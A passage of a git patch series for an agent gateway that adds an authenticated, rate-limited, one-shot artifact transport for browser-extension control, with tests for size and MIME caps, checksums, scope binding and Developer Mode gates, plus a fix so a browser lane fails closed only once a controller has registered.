broker's gate for ``browser_evaluate`` and raw CDP. + Tests monkeypatch this method directly to force the gate on/off. + """ + try: + return browser_control_developer_mode() + except Exception: + return False + + # ------------------------------------------------------------------ + # One-shot artifact transport (Phase 8 Task 29) + # ------------------------------------------------------------------ + + def _artifact_store_for(self, profile: str) -> ArtifactStore: + """Return the profile-scoped artifact store, creating it lazily. + + The store root lives under the profile's data directory + (``/plugin-data/.../artifacts``-style controlled root), + so artifacts never escape the profile boundary. The root itself is + created on first use; TTL cleanup runs on every store/load/prune. + """ + if self._browser_control_artifacts is not None: + return self._browser_control_artifacts + try: + from hermes_cli.profiles import get_profile_dir + + profile_root = get_profile_dir(profile or "default") + root = Path(profile_root) / "artifacts" / "browser-control" + except Exception: + # Unscoped fallback used only when profile resolution is + # unavailable (tests/manual wiring): keep the controlled root + # under the Hermes home. + try: + from hermes_state import get_hermes_home + + root = Path(get_hermes_home()) / "artifacts" / "browser-control" + except Exception: + raise ArtifactError("no artifact root is resolvable") from None + store = ArtifactStore( + root, + ttl_seconds=DEFAULT_ARTIFACT_TTL_SECONDS, + max_bytes=DEFAULT_MAX_ARTIFACT_BYTES, + allowed_mime_types=DEFAULT_ALLOWED_MIME_TYPES, + ) + store.prune_expired() + self._browser_control_artifacts = store + # Share the store with the broker so artifact actions dispatched to a + # controller validate their artifact reference against the same + # controlled root ("approved artifact id only"). + try: + self._browser_control_broker.attach_artifact_store(store) + except Exception: + logger.debug("could not attach artifact store to broker", exc_info=True) + return store + + def _artifact_limiter(self) -> ArtifactRateLimiter: + """Return the per-principal artifact route limiter (lazy).""" + if self._browser_control_artifact_limiter is None: + self._browser_control_artifact_limiter = ArtifactRateLimiter( + window_seconds=60.0, + max_requests=30, + ) + return self._browser_control_artifact_limiter + + def _inject_browser_control_artifacts( + self, + store: Optional[ArtifactStore], + limiter: Optional[ArtifactRateLimiter] = None, + ) -> None: + """Inject a store/limiter (tests, diagnostics).""" + self._browser_control_artifacts = store + if limiter is not None: + self._browser_control_artifact_limiter = limiter + + @staticmethod + def _artifact_auth_fail(request: "web.Request", status: int, code: str, message: str): + return web.json_response( + _openai_error( + message, + err_type="gateway_auth_error" if status == 401 else "invalid_request_error", + code=code, + ), + status=status, + ) + + async def _handle_artifact_upload(self, request: "web.Request") -> "web.Response": + """POST /v1/artifacts/upload — one-shot bounded artifact upload. + + Authenticated with the same Bearer API key as every other API-server + route and gated on browser.extension_control.enabled. The body is + read as raw bytes with an exact size cap; ``Content-Type`` must name + an allowed MIME type and ``X-Artifact-Filename`` supplies the + display-only name. On success returns a provenance receipt carrying + the server-minted artifact id, SHA-256, size, TTL, and download path + — never a filesystem path. + + Status ladder: 404 feature disabled, 403 no API key configured, 401 + bad/missing Bearer, 429 rate limited, 413 too large, 415 MIME + rejected, 400 missing filename/scope, 201 success. + """ + if not self._browser_control_enabled(): + return web.json_response( + _openai_error( + "Browser control is not enabled on this server.", + code="browser_control_disabled", + ), + status=404, + ) + if not self._api_key: + return web.json_response( + _openai_error( + "Artifact transport requires a configured API key.", + err_type="gateway_auth_error", + code="browser_control_auth_required", + ), + status=403, + ) + auth_err = self._check_auth(request) + if auth_err: + return auth_err + + profile = _api_request_profile.get() or "default" + principal = self._derive_browser_control_principal(profile) + limiter = self._artifact_limiter() + if not limiter.allow(f"upload:{principal}"): + return web.json_response( + _openai_error( + "Artifact upload rate limit exceeded.", + err_type="rate_limit_error", + code="rate_limit_exceeded", + ), + status=429, + headers={"Retry-After": "1"}, + ) + + content_type = request.headers.get("Content-Type", "") + filename = request.headers.get("X-Artifact-Filename", "").strip() + if not filename: + return web.json_response( + _openai_error("X-Artifact-Filename header is required."), + status=400, + ) + + # Bounded read: cap at the store's byte cap + 1 so an oversize body + # is detected and rejected without buffering unbounded data. + try: + store = self._artifact_store_for(profile) + except ArtifactError as exc: + return web.json_response(_openai_error(str(exc), code="artifact_rejected"), status=500) + max_bytes = store.max_bytes + try: + data = await request.content.read(max_bytes + 1) + except Exception: + return web.json_response(_openai_error("Failed to read request body."), status=400) + if len(data) > max_bytes: + return web.json_response( + _openai_error( + f"Artifact exceeds the {max_bytes}-byte cap.", + code="artifact_too_large", + ), + status=413, + ) + if not data: + return web.json_response(_openai_error("Empty artifact body."), status=400) + + try: + receipt = store.store( + data, + filename=filename, + content_type=content_type, + scope=_ArtifactScopeFacade( + principal, + transport_family=self._browser_control_transport_family(request), + ), + ) + except ArtifactTooLarge as exc: + return web.json_response( + _openai_error(str(exc), code="artifact_too_large"), status=413 + ) + except ArtifactError as exc: + code = "artifact_mime_rejected" if "allowlist" in str(exc) else "artifact_rejected" + status = 415 if "allowlist" in str(exc) else 400 + return web.json_response(_openai_error(str(exc), code=code), status=status) + + return web.json_response( + receipt.to_dict(download_path=f"/v1/artifacts/download/{receipt.artifact_id}"), + status=201, + ) + + async def _handle_artifact_download(self, request: "web.Request") -> "web.Response": + """GET /v1/artifacts/download/{artifact_id} — one-shot download. + + Authenticated and gated identically to upload. The artifact is + consumed on success: the second download of the same id returns 404. + The response streams the verified bytes with the recorded content + type and a ``X-Artifact-Sha256`` header for client-side validation. + + Status ladder: 404 feature disabled / unknown artifact, 403 no API + key, 401 bad/missing Bearer, 429 rate limited, 410 expired, 400 + invalid id / scope mismatch, 200 success. + """ + if not self._browser_control_enabled(): + raise web.HTTPNotFound() + if not self._api_key: + return web.json_response( + _openai_error( + "Artifact transport requires a configured API key.", + err_type="gateway_auth_error", + code="browser_control_auth_required", + ), + status=403, + ) + auth_err = self._check_auth(request) + if auth_err: + return auth_err + + profile = _api_request_profile.get() or "default" + principal = self._derive_browser_control_principal(profile) + limiter = self._artifact_limiter() + if not limiter.allow(f"download:{principal}"): + return web.json_response( + _openai_error( + "Artifact download rate limit exceeded.", + err_type="rate_limit_error", + code="rate_limit_exceeded", + ), + status=429, + headers={"Retry-After": "1"}, + ) + + artifact_id = request.match_info.get("artifact_id", "") + try: + store = self._artifact_store_for(profile) + data, receipt = store.load( + artifact_id, + scope=_ArtifactScopeFacade( + principal, + transport_family=self._browser_control_transport_family(request), + ), + ) + except ArtifactError as exc: + message = str(exc) + if "expired" in message: + return web.json_response( + _openai_error(message, code="artifact_expired"), status=410 + ) + status = 400 if "scope" in message or "invalid" in message else 404 + return web.json_response( + _openai_error(message, code="artifact_not_found"), status=status + ) + + return web.Response( + body=data, + status=200, + content_type=receipt.content_type, + headers={ + "X-Artifact-Sha256": receipt.sha256, + "X-Artifact-Id": receipt.artifact_id, + "Content-Disposition": f'attachment; filename="{receipt.filename}"', + }, + ) + async def _handle_skills(self, request: "web.Request") -> "web.Response": """GET /v1/skills — list installed skills visible to the API-server agent. diff --git a/tests/gateway/test_browser_control_artifacts.py b/tests/gateway/test_browser_control_artifacts.py new file mode 100644 index 0000000000..10597adb8b --- /dev/null +++ b/tests/gateway/test_browser_control_artifacts.py @@ -0,0 +1,591 @@ +"""Phase 8 Task 29/30: one-shot artifact transport + broker gates. + +Exercises the transport-neutral store core +(:mod:`gateway.browser_control_artifacts`), the API-server routes +(``/v1/artifacts/upload`` + ``/v1/artifacts/download/{artifact_id}`` with +auth and per-principal rate limits), and the broker's Developer Mode gates +for ``browser_evaluate`` / raw CDP plus artifact referencing +("approved artifact id only"). +""" + +import hashlib +import os + +import pytest +from aiohttp import web +from aiohttp.test_utils import TestClient, TestServer + +from gateway.browser_control_artifacts import ( + ArtifactChecksumMismatch, + ArtifactError, + ArtifactExpired, + ArtifactMimeRejected, + ArtifactNotFound, + ArtifactRateLimiter, + ArtifactScopeMismatch, + ArtifactStore, + ArtifactTooLarge, + ArtifactTraversal, + artifact_scope_key, +) +from gateway.browser_control_broker import ( + BROWSER_CONTROL_ARTIFACT_CAPABILITIES, + BROWSER_CONTROL_CAPABILITIES, + BROWSER_CONTROL_DEVELOPER_CAPABILITIES, + BrowserControlBroker, + ControllerRejected, + ControllerScope, + ControllerUnavailable, + browser_control_developer_mode, + filter_browser_control_capabilities, +) +from gateway.config import PlatformConfig +from gateway.platforms.api_server import APIServerAdapter + + +API_KEY = "-".join(("fixture", "neutral", "api", "key", "123")) +PNG_BYTES = bytes.fromhex("89504e470d0a1a0a0000000d49484452000000010000000108060000001f15c489") +TEXT_BYTES = b"fixture artifact payload\n" + + +class _Scope: + """Minimal attribute scope accepted by artifact_scope_key.""" + + def __init__(self, principal="principal-fixture", session="session-fixture", family="local-api"): + self.principal_id = principal + self.session_id = session + self.transport_family = family + + +def _adapter(*, key=API_KEY): + adapter = APIServerAdapter( + PlatformConfig(enabled=True, extra={"key": key} if key else {}) + ) + return adapter + + +def _app(adapter): + app = web.Application() + app.router.add_post("/v1/artifacts/upload", adapter._handle_artifact_upload) + app.router.add_get( + "/v1/artifacts/download/{artifact_id}", adapter._handle_artifact_download + ) + app.router.add_get("/v1/capabilities", adapter._handle_capabilities) + return app + + +def _auth(): + return {"Authorization": f"Bearer {API_KEY}"} + + +# ---------------------------------------------------------------------- +# Store core: size/MIME caps, SHA-256, scope binding, one-shot, TTL +# ---------------------------------------------------------------------- + + +def test_store_rejects_oversize_and_disallowed_mime_before_writing(tmp_path): + store = ArtifactStore(tmp_path / "root", max_bytes=8, allowed_mime_types=frozenset({"image/png"})) + with pytest.raises(ArtifactTooLarge): + store.store(b"123456789", filename="big.png", content_type="image/png", scope=_Scope()) + with pytest.raises(ArtifactMimeRejected): + store.store(b"123", filename="doc.txt", content_type="text/plain", scope=_Scope()) + assert store.count() == 0 + assert not list((tmp_path / "root").iterdir()) + + +def test_store_round_trip_validates_sha256_and_is_one_shot(tmp_path): + store = ArtifactStore(tmp_path / "root") + receipt = store.store( + PNG_BYTES, + filename="shot.png", + content_type="image/png", + scope=_Scope(), + ) + assert receipt.size_bytes == len(PNG_BYTES) + assert receipt.sha256 == hashlib.sha256(PNG_BYTES).hexdigest() + assert receipt.filename == "shot.png" + assert receipt.expires_at > receipt.created_at + + data, loaded = store.load(receipt.artifact_id, scope=_Scope()) + assert data == PNG_BYTES + assert loaded.artifact_id == receipt.artifact_id + # One-shot: a second load must fail. + with pytest.raises(ArtifactNotFound): + store.load(receipt.artifact_id, scope=_Scope()) + + +def test_store_rejects_tampered_file_via_checksum(tmp_path): + store = ArtifactStore(tmp_path / "root") + receipt = store.store( + TEXT_BYTES, filename="note.txt", content_type="text/plain", scope=_Scope() + ) + target = tmp_path / "root" / receipt.artifact_id + target.write_bytes(b"tampered bytes") + with pytest.raises(ArtifactChecksumMismatch): + store.load(receipt.artifact_id, scope=_Scope()) + # The tampered artifact is not consumed; a later store to a fresh id works. + assert store.count() == 1 + + +def test_store_is_scope_bound_and_principal_required(tmp_path): + store = ArtifactStore(tmp_path / "root") + receipt = store.store( + TEXT_BYTES, filename="note.txt", content_type="text/plain", scope=_Scope() + ) + with pytest.raises(ArtifactScopeMismatch): + store.load(receipt.artifact_id, scope=_Scope(principal="other-principal")) + with pytest.raises(ArtifactScopeMismatch): + store.load(receipt.artifact_id, scope=_Scope(family="remote-api")) + with pytest.raises(ArtifactError, match="principal"): + store.store( + TEXT_BYTES, + filename="note.txt", + content_type="text/plain", + scope=_Scope(principal=""), + ) + + +def test_store_rejects_traversal_ids_and_mints_server_ids(tmp_path): + store = ArtifactStore(tmp_path / "root") + with pytest.raises(ArtifactTraversal): + store.validate("../escape", scope=_Scope()) + with pytest.raises(ArtifactTraversal): + store.validate("not-hex!", scope=_Scope()) + with pytest.raises(ArtifactTraversal): + store.validate("", scope=_Scope()) + receipt = store.store( + TEXT_BYTES, filename="note.txt", content_type="text/plain", scope=_Scope() + ) + # Ids are server-minted 32-hex; filenames never become paths. + assert len(receipt.artifact_id) == 32 + assert all(character in "0123456789abcdef" for character in receipt.artifact_id) + assert store.validate(receipt.artifact_id, scope=_Scope()).artifact_id == receipt.artifact_id + + +def test_store_ttl_prunes_expired_and_drops_orphan_temps(tmp_path): + now = [1000.0] + store = ArtifactStore(tmp_path / "root", ttl_seconds=10.0, clock=lambda: now[0]) + receipt = store.store( + TEXT_BYTES, filename="note.txt", content_type="text/plain", scope=_Scope() + ) + assert store.count() == 1 + # Load also fails once TTL elapses, and the entry is pruned. + now[0] = 1011.0 + with pytest.raises(ArtifactExpired): + store.load(receipt.artifact_id, scope=_Scope()) + assert store.count() == 0 + # Explicit sweep is idempotent and removes stale temp files. + orphan = tmp_path / "root" / ("deadbeef" * 4 + ".tmp") + orphan.write_bytes(b"x") + os.utime(orphan, (900.0, 900.0)) + assert store.prune_expired(now[0]) == 0 + assert not orphan.exists() + + +def test_scope_key_is_stable_across_reconnect_and_distinct_per_principal(tmp_path): + key = artifact_scope_key(_Scope()) + assert key == artifact_scope_key(_Scope()) + assert key != artifact_scope_key(_Scope(principal="other-principal")) + assert key != artifact_scope_key(_Scope(family="remote-api")) + + +# ---------------------------------------------------------------------- +# Rate limiter +# ---------------------------------------------------------------------- + + +def test_rate_limiter_sliding_window_per_key(): + now = [100.0] + limiter = ArtifactRateLimiter(window_seconds=60.0, max_requests=3, clock=lambda: now[0]) + assert limiter.allow("principal-a") + assert limiter.allow("principal-a") + assert limiter.allow("principal-a") + assert limiter.allow("principal-a") is False + # A different key has its own budget. + assert limiter.allow("principal-b") + # Older hits slide out of the window. + now[0] = 170.0 + assert limiter.allow("principal-a") + limiter.reset("principal-a") + assert limiter.allow("principal-a") + + +# ---------------------------------------------------------------------- +# Broker: Developer Mode gates + artifact referencing +# ---------------------------------------------------------------------- + + +def _broker_scope(**overrides): + values = { + "principal_id": "principal-fixture", + "profile_id": "default", + "session_id": "session-fixture", + "controller_id": "controller-fixture", + "browser_profile_id": "browser-profile-fixture", + "transport_family": "local-api", + "capabilities": frozenset({"controller.noop"}), + } + values.update(overrides) + return ControllerScope(**values) + + +def test_developer_capabilities_are_never_in_the_base_allowlist(): + assert BROWSER_CONTROL_CAPABILITIES.isdisjoint(BROWSER_CONTROL_DEVELOPER_CAPABILITIES) + assert BROWSER_CONTROL_ARTIFACT_CAPABILITIES.isdisjoint(BROWSER_CONTROL_DEVELOPER_CAPABILITIES) + + +def test_filter_rejects_developer_capabilities_without_developer_mode(): + requested = [ + "controller.noop", + "browser_navigate", + "browser_evaluate", + "browser_cdp", + "browser_artifact_upload", + "browser_artifact_download", + "arbitrary.capability", + ] + assert filter_browser_control_capabilities(requested, developer_mode=False) == frozenset( + {"controller.noop", "browser_navigate", "browser_artifact_upload", "browser_artifact_download"} + ) + assert filter_browser_control_capabilities(requested, developer_mode=True) == frozenset( + { + "controller.noop", + "browser_navigate", + "browser_artifact_upload", + "browser_artifact_download", + "browser_evaluate", + "browser_cdp", + } + ) + assert filter_browser_control_capabilities("not-a-list", developer_mode=True) == frozenset() + + +def test_browser_control_developer_mode_reads_config_flag(): + assert browser_control_developer_mode({"browser": {"extension_control": {"developer_mode": True}}}) is True + assert browser_control_developer_mode({"browser": {"extension_control": {}}}) is False + assert browser_control_developer_mode({"browser": {}}) is False + assert browser_control_developer_mode(None) is False + + +def test_broker_developer_gate_blocks_evaluate_and_cdp_dispatch(tmp_path): + broker = BrowserControlBroker(developer_mode=False) + store = ArtifactStore(tmp_path / "root") + broker.attach_artifact_store(store) + scope = _broker_scope( + capabilities=frozenset({"browser_evaluate", "browser_cdp", "controller.noop"}) + ) + broker.attach(scope, lambda _frame: None) + + # Even though the controller claims the capability, Developer Mode off + # fails closed at selection time. + with pytest.raises(ControllerUnavailable): + broker.dispatch(scope, action="browser_evaluate", arguments={"expression": "1"}) + with pytest.raises(ControllerUnavailable): + broker.dispatch(scope, action="browser_cdp", arguments={"method": "Page.navigate"}) + assert broker.select(scope, "browser_evaluate") is None + + +def test_broker_developer_mode_allows_negotiated_privileged_dispatch(tmp_path): + broker = BrowserControlBroker(developer_mode=True) + store = ArtifactStore(tmp_path / "root") + broker.attach_artifact_store(store) + scope = _broker_scope( + capabilities=frozenset({"browser_evaluate", "browser_cdp", "controller.noop"}) + ) + + def send(frame): + broker.complete( + frame["params"]["command_id"], + ok=True, + result={"expression": frame["params"]["arguments"]["expression"]}, + ) + + broker.attach(scope, send) + result = broker.dispatch( + scope, action="browser_evaluate", arguments={"expression": "document.title"} + ) + assert result == {"expression": "document.title"} + + +def test_broker_artifact_action_requires_attached_store(tmp_path): + broker = BrowserControlBroker() + scope = _broker_scope( + capabilities=frozenset({"browser_artifact_download", "controller.noop"}) + ) + broker.attach(scope, lambda _frame: None) + with pytest.raises(ControllerRejected, match="artifact store"): + broker.dispatch( + scope, + action="browser_artifact_download", + arguments={"artifact_id": "a" * 32}, + ) + + +def test_broker_artifact_action_requires_approved_id_only(tmp_path): + broker = BrowserControlBroker() + store = ArtifactStore(tmp_path / "root") + broker.attach_artifact_store(store) + scope = _broker_scope( + capabilities=frozenset({"browser_artifact_download", "controller.noop"}) + ) + frames = [] + + def send(frame): + frames.append(frame) + broker.complete(frame["params"]["command_id"], ok=True, result={"ok": True}) + + broker.attach(scope, send) + + # Unknown id fails closed with the artifact error surfaced. + with pytest.raises(ControllerRejected, match="unknown artifact"): + broker.dispatch( + scope, + action="browser_artifact_download", + arguments={"artifact_id": "b" * 32}, + ) + assert frames == [] + + # Missing id is refused. + with pytest.raises(ControllerRejected, match="non-empty artifact_id"): + broker.dispatch(scope, action="browser_artifact_download", arguments={}) + + # An approved (stored, scope-bound) id dispatches; the frame carries the + # id, never the bytes. + receipt = store.store( + PNG_BYTES, + filename="shot.png", + content_type="image/png", + scope=_Scope(), + ) + result = broker.dispatch( + scope, + action="browser_artifact_download", + arguments={"artifact_id": receipt.artifact_id}, + ) + assert result == {"ok": True} + assert frames[0]["params"]["arguments"]["artifact_id"] == receipt.artifact_id + # The frame carries only the id — never the payload bytes. + assert "data" not in frames[0]["params"]["arguments"] + assert all( + not isinstance(value, bytes) for value in frames[0]["params"]["arguments"].values() + ) + + +def test_broker_artifact_action_rejects_other_scope_artifact(tmp_path): + broker = BrowserControlBroker() + store = ArtifactStore(tmp_path / "root") + broker.attach_artifact_store(store) + scope = _broker_scope( + capabilities=frozenset({"browser_artifact_upload", "controller.noop"}) + ) + broker.attach(scope, lambda _frame: None) + receipt = store.store( + TEXT_BYTES, + filename="note.txt", + content_type="text/plain", + scope=_Scope(principal="someone-else"), + ) + with pytest.raises(ControllerRejected, match="different scope"): + broker.dispatch( + scope, + action="browser_artifact_upload", + arguments={"artifact_id": receipt.artifact_id}, + ) + + +# ---------------------------------------------------------------------- +# API-server routes: auth, feature gate, size/MIME, one-shot, rate limit +# ---------------------------------------------------------------------- + + +@pytest.mark.asyncio +async def test_artifact_upload_requires_auth_and_feature_flag(monkeypatch): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + async with TestClient(TestServer(_app(adapter))) as client: + response = await client.post( + "/v1/artifacts/upload", + data=TEXT_BYTES, + headers={"Content-Type": "text/plain", "X-Artifact-Filename": "note.txt"}, + ) + assert response.status == 401 + + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: False) + async with TestClient(TestServer(_app(adapter))) as client: + response = await client.post( + "/v1/artifacts/upload", + data=TEXT_BYTES, + headers={ + "Content-Type": "text/plain", + "X-Artifact-Filename": "note.txt", + **_auth(), + }, + ) + assert response.status == 404 + + +@pytest.mark.asyncio +async def test_artifact_upload_download_round_trip_one_shot(monkeypatch, tmp_path): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + store = ArtifactStore(tmp_path / "root") + adapter._inject_browser_control_artifacts(store) + + async with TestClient(TestServer(_app(adapter))) as client: + upload = await client.post( + "/v1/artifacts/upload", + data=TEXT_BYTES, + headers={ + "Content-Type": "text/plain", + "X-Artifact-Filename": "note.txt", + **_auth(), + }, + ) + assert upload.status == 201 + receipt = await upload.json() + assert receipt["size_bytes"] == len(TEXT_BYTES) + assert receipt["sha256"] == hashlib.sha256(TEXT_BYTES).hexdigest() + assert receipt["one_shot"] is True + assert receipt["download_path"] == f"/v1/artifacts/download/{receipt['artifact_id']}" + + download = await client.get(receipt["download_path"], headers=_auth()) + assert download.status == 200 + body = await download.read() + assert body == TEXT_BYTES + assert download.headers["X-Artifact-Sha256"] == receipt["sha256"] + + # One-shot: the same id is consumed. + replay = await client.get(receipt["download_path"], headers=_auth()) + assert replay.status == 404 + + +@pytest.mark.asyncio +async def test_artifact_upload_rejects_mime_and_missing_filename(monkeypatch, tmp_path): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + store = ArtifactStore(tmp_path / "root") + adapter._inject_browser_control_artifacts(store) + async with TestClient(TestServer(_app(adapter))) as client: + bad_mime = await client.post( + "/v1/artifacts/upload", + data=b"", + headers={ + "Content-Type": "text/html", + "X-Artifact-Filename": "page.html", + **_auth(), + }, + ) + assert bad_mime.status == 415 + + no_name = await client.post( + "/v1/artifacts/upload", + data=TEXT_BYTES, + headers={"Content-Type": "text/plain", **_auth()}, + ) + assert no_name.status == 400 + + +@pytest.mark.asyncio +async def test_artifact_upload_bounded_body_rejects_oversize(monkeypatch, tmp_path): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + store = ArtifactStore(tmp_path / "root", max_bytes=16) + adapter._inject_browser_control_artifacts(store) + async with TestClient(TestServer(_app(adapter))) as client: + response = await client.post( + "/v1/artifacts/upload", + data=b"x" * 17, + headers={ + "Content-Type": "text/plain", + "X-Artifact-Filename": "big.txt", + **_auth(), + }, + ) + assert response.status == 413 + + +@pytest.mark.asyncio +async def test_artifact_download_rejects_foreign_scope_and_unknown_id(monkeypatch, tmp_path): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + store = ArtifactStore(tmp_path / "root") + adapter._inject_browser_control_artifacts(store) + receipt = store.store( + TEXT_BYTES, + filename="note.txt", + content_type="text/plain", + scope=_Scope(principal="someone-else"), + ) + async with TestClient(TestServer(_app(adapter))) as client: + foreign = await client.get( + f"/v1/artifacts/download/{receipt.artifact_id}", headers=_auth() + ) + assert foreign.status == 400 + + unknown = await client.get( + "/v1/artifacts/download/" + "f" * 32, headers=_auth() + ) + assert unknown.status == 404 + + +@pytest.mark.asyncio +async def test_artifact_routes_rate_limit_per_principal(monkeypatch, tmp_path): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + store = ArtifactStore(tmp_path / "root") + limiter = ArtifactRateLimiter(window_seconds=60.0, max_requests=2) + adapter._inject_browser_control_artifacts(store, limiter) + async with TestClient(TestServer(_app(adapter))) as client: + statuses = [] + for _index in range(3): + response = await client.post( + "/v1/artifacts/upload", + data=TEXT_BYTES, + headers={ + "Content-Type": "text/plain", + "X-Artifact-Filename": "note.txt", + **_auth(), + }, + ) + statuses.append(response.status) + assert statuses == [201, 201, 429] + + +@pytest.mark.asyncio +async def test_capabilities_advertise_artifact_transport_and_developer_mode(monkeypatch): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + monkeypatch.setattr(adapter, "_browser_control_developer_mode", lambda: True) + async with TestClient(TestServer(_app(adapter))) as client: + response = await client.get("/v1/capabilities", headers=_auth()) + assert response.status == 200 + data = await response.json() + + control = data["features"]["browser_extension_control"] + assert control["developer_mode"] is True + assert "browser_evaluate" in control["developer_capabilities"] + assert "browser_cdp" in control["developer_capabilities"] + assert "browser_evaluate" not in control["capabilities"] + assert control["artifact_transport"]["upload"] == { + "method": "POST", + "path": "/v1/artifacts/upload", + } + assert control["artifact_transport"]["download"]["path"] == ( + "/v1/artifacts/download/{artifact_id}" + ) + assert data["endpoints"]["artifact_upload"] == { + "method": "POST", + "path": "/v1/artifacts/upload", + } + assert data["endpoints"]["artifact_download"] == { + "method": "GET", + "path": "/v1/artifacts/download/{artifact_id}", + } + + +def test_route_table_advertises_artifact_routes(): + adapter = _adapter() + routes = {(method, path) for method, path, _handler in adapter._http_route_table()} + assert ("POST", "/v1/artifacts/upload") in routes + assert ("GET", "/v1/artifacts/download/{artifact_id}") in routes From a4bfd7e1449895810507edf27a76a03cbc49a348 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 18:31:18 +0530 Subject: [PATCH 015/161] chore(config): declare browser.extension_control in DEFAULT_CONFIG The feature flag was only documented in cli-config.yaml.example; every other browser.* key is declared in DEFAULT_CONFIG so config tooling (dashboard editor, hermes config get) can see it. Defaults unchanged: enabled=False, developer_mode=False. Surfaced during review of PR #85351. --- hermes_cli/config_defaults.py | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/hermes_cli/config_defaults.py b/hermes_cli/config_defaults.py index cf3769c0c7..f0d96d9e0d 100644 --- a/hermes_cli/config_defaults.py +++ b/hermes_cli/config_defaults.py @@ -569,6 +569,16 @@ DEFAULT_CONFIG = { "rewrite_loopback_urls": False, "loopback_host_alias": "host.docker.internal", }, + # Authenticated browser-extension controller lane. When enabled, an + # extension that registers through the gateway can become the exact + # controller for a session's browser_* tools (fail-closed once bound). + # Local API registration additionally requires the API server bearer + # key. developer_mode gates the privileged capabilities + # (browser_cdp / browser_evaluate) — never negotiable without it. + "extension_control": { + "enabled": False, + "developer_mode": False, + }, }, # Filesystem checkpoints — automatic snapshots before destructive file ops. From a5882058de7db8c34bf6d72f05c42183b08ab46b Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 18:47:41 +0530 Subject: [PATCH 016/161] fix(browser): bind the extension lane at controller registration, not transport auth MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The router treated any server-stamped principal as a bound lane, so with the flag ON every authenticated dashboard/API session lost the legacy browser backend even when no extension controller ever registered (scope_for_session returns None -> ControllerUnavailable, no fallback) — while check_fns still advertised the tools via the legacy OR-gate. New broker.lane_registered() distinguishes the two cases: - lane never registered -> generic callers keep the legacy backend - lane registered (controller offline/ambiguous) -> fail closed, unchanged — a control-this-tab session never silently jumps to another browser Also makes the four non-allowlisted wrapped tools (cdp/console/vision/ get_images) behave correctly for never-registered lanes (legacy backend) while staying fail-closed for registered lanes. Surfaced during review of PR #85351. --- gateway/browser_control_broker.py | 29 ++++++ tests/tools/test_browser_extension_router.py | 92 +++++++++++++++++++- tools/browser_extension_router.py | 15 ++++ 3 files changed, 135 insertions(+), 1 deletion(-) diff --git a/gateway/browser_control_broker.py b/gateway/browser_control_broker.py index e66105d921..c8a97fa8eb 100644 --- a/gateway/browser_control_broker.py +++ b/gateway/browser_control_broker.py @@ -912,6 +912,35 @@ class BrowserControlBroker: ] return matches[0] if len(matches) == 1 else None + def lane_registered( + self, + *, + session_id: Optional[str] = None, + task_id: Optional[str] = None, + principal_id: Optional[str] = None, + transport_family: Optional[str] = None, + ) -> bool: + """Return whether ANY controller (even offline) registered for this lane. + + Distinguishes "a controller bound this session lane and is currently + unavailable" (fail closed — the extension lane stays authoritative) + from "no controller ever registered here" (the caller keeps the + legacy browser backend). Ambiguous lanes report True so the caller + still fails closed rather than silently switching browsers. + """ + target = str(session_id or task_id or "").strip() + principal = str(principal_id or "").strip() + family = str(transport_family or "").strip() + if not target or not principal or not family: + return False + with self._lock: + return any( + scope.session_id == target + and scope.principal_id == principal + and scope.transport_family == family + for scope in self._controllers + ) + def disconnect_owner(self, owner: Any) -> int: """Mark every controller owned by one lost transport offline.""" with self._lock: diff --git a/tests/tools/test_browser_extension_router.py b/tests/tools/test_browser_extension_router.py index ea796beec7..3ab857579f 100644 --- a/tests/tools/test_browser_extension_router.py +++ b/tests/tools/test_browser_extension_router.py @@ -4,17 +4,23 @@ from tools.browser_extension_router import route_browser_tool, routed_browser_ha class FakeBroker: - def __init__(self, *, scope=None, selected=None, result=None, error=None): + def __init__(self, *, scope=None, selected=None, result=None, error=None, + registered=True): self.scope = scope self.selected = selected self.result = result self.error = error + self.registered = registered self.calls = [] def scope_for_session(self, **identity): self.calls.append(("scope", identity)) return self.scope + def lane_registered(self, **identity): + self.calls.append(("lane_registered", identity)) + return self.registered + def select(self, scope, action): self.calls.append(("select", scope, action)) return self.selected @@ -75,6 +81,90 @@ def test_bound_request_without_exact_capable_controller_fails_closed(scope, sele assert not any(call[0] == "dispatch" for call in broker.calls) +def test_stamped_identity_without_registered_lane_keeps_legacy_backend(): + """Transport auth alone must not make the extension lane authoritative. + + A dashboard/API session carries a server-stamped principal for every + authenticated request, but until a controller actually REGISTERS for the + lane, browser tools keep the legacy backend (regression: flag ON + + authenticated session + no extension bricked every browser_* call). + """ + broker = FakeBroker(scope=None, registered=False) + fallbacks = [] + + result = route_browser_tool( + "browser_navigate", + {"url": "https://example.test"}, + fallback=lambda: fallbacks.append(True) or "legacy-result", + broker=broker, + enabled=True, + session_id="session-fixture", + principal_id="principal-fixture", + transport_family="cloud-ticket-ws", + tool_call_id="tool-call-fixture", + ) + + assert result == "legacy-result" + assert fallbacks == [True] + assert not any(call[0] == "dispatch" for call in broker.calls) + + +def test_registered_lane_with_offline_controller_still_fails_closed(): + """Once a controller registered, its absence is fail-closed, not fallback.""" + from gateway.browser_control_broker import ControllerUnavailable + + broker = FakeBroker(scope=None, registered=True) + fallbacks = [] + + with pytest.raises(ControllerUnavailable, match="browser_navigate"): + route_browser_tool( + "browser_navigate", + {"url": "https://example.test"}, + fallback=lambda: fallbacks.append(True) or "unsafe-legacy-result", + broker=broker, + enabled=True, + session_id="session-fixture", + principal_id="principal-fixture", + transport_family="cloud-ticket-ws", + tool_call_id="tool-call-fixture", + ) + + assert fallbacks == [] + + +def test_real_broker_lane_registered_tracks_registration_lifecycle(): + """lane_registered: False before attach, True after, True while offline.""" + from gateway.browser_control_broker import BrowserControlBroker, ControllerScope + + broker = 